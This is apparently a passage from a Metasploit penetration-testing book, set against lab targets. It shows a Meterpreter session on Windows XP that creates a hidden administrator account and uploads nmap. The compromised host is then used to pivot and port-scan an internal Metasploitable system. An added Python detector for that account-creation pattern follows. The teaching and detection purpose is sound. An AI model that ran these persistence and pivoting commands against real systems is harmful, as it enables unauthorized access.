258

Chapter 17

Process 2480 created.
Channel 6 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>net user msf metasploit /add
net user msf metasploit /ADD
The command completed successfully.

C:\WINDOWS\system32>net localgroup administrators msf /add
net localgroup administrators msf /add
The command completed successfully.

C:\WINDOWS\system32>
C:\WINDOWS\system32>^Z
Background channel 6? [y/N]  y
meterpreter > upload nmap.exe
[*] uploading  : nmap.exe -> nmap.exe
[*] uploaded   : nmap.exe -> nmap.exe
meterpreter >

We now have our launching pad for additional attacks. With nmap installed on the target, we are essentially sitting on the internal network. We can now attempt to enumerate internally connected systems and further penetrate the network.
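From the defender's side, the account-creation sequence in the session above leaves a recognizable trace in process-creation logging. The following check is an added example, not code from the book: it pairs a "net user ... /add" with a later "net localgroup administrators ... /add" for the same account on the same host within a short window. The log line format, host names and timestamps are constructed for the example.

```python
# Added example (not from the book): detect the local-admin persistence pattern
# shown in the transcript (account created, then added to Administrators) from
# process command-line logs. Log format and values below are constructed.
import re
from datetime import datetime, timedelta

# Constructed sample lines: "<ISO timestamp> host=<host> cmd=<command line>"
SAMPLE_LOG = """\
2011-04-02T10:15:02 host=XPVICTIM cmd=net user msf metasploit /ADD
2011-04-02T10:15:31 host=XPVICTIM cmd=net localgroup administrators msf /add
2011-04-02T10:16:10 host=XPVICTIM cmd=C:\\WINDOWS\\system32\\nmap.exe -sT -A -P0 172.16.32.162
2011-04-02T11:00:00 host=FILESRV cmd=net user helpdesk Pa55 /add
2011-04-02T14:30:00 host=FILESRV cmd=net localgroup administrators helpdesk /add
"""

# "net user <name> [<password>] /add" -- case-insensitive, as "/ADD" shows above
USER_ADD = re.compile(r"^net\s+user\s+(\S+)(?:\s+\S+)?\s+/add\b", re.I)
# "net localgroup administrators <name> /add"
ADMIN_ADD = re.compile(r"^net\s+localgroup\s+administrators\s+(\S+)\s+/add\b", re.I)
LINE = re.compile(r"^(\S+)\s+host=(\S+)\s+cmd=(.*)$")

def parse(log):
    """Yield (timestamp, host, command line) for each well-formed log line."""
    for raw in log.splitlines():
        m = LINE.match(raw)
        if m:
            yield datetime.fromisoformat(m.group(1)), m.group(2), m.group(3)

def find_admin_persistence(log, window=timedelta(minutes=10)):
    """Return (host, user) pairs where an account was created and then added
    to Administrators on the same host within `window` of its creation."""
    created = {}  # (host, user) -> time the account was created
    hits = []
    for ts, host, cmd in parse(log):
        m = USER_ADD.match(cmd)
        if m:
            created[(host, m.group(1).lower())] = ts
            continue
        m = ADMIN_ADD.match(cmd)
        if m:
            key = (host, m.group(1).lower())
            if key in created and ts - created[key] <= window:
                hits.append(key)
    return hits

if __name__ == "__main__":
    # The helpdesk account on FILESRV is promoted 3.5 hours later and is not
    # flagged at the default window; widen `window` to include it.
    print(find_admin_persistence(SAMPLE_LOG))
```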

Scanning the Metasploitable System

With our Meterpreter session granting us access to the internal network via the load auto_add_route command, we can scan and exploit the inside hosts using the compromised Windows XP target as the launching point. We're effectively connected to the internal network, so we should be able to reach our Metasploitable system. Let's begin with a basic port scan.

nmap.exe -sT -A -P0 172.16.32.162

PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         ProFTPD 1.3.1
|_ftp-bounce: no banner
22/tcp   open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey: 1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
23/tcp   open  telnet      Linux telnetd
25/tcp   open  smtp        Postfix smtpd
53/tcp   open  domain      ISC BIND 9.4.2
80/tcp   open  http        Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.10 with Suhosin-Patch)
|_html-title: Site doesn't have a title (text/html).
139/tcp  open  netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
3306/tcp open  mysql       MySQL 5.0.51a-3ubuntu5
5432/tcp open  postgresql  PostgreSQL DB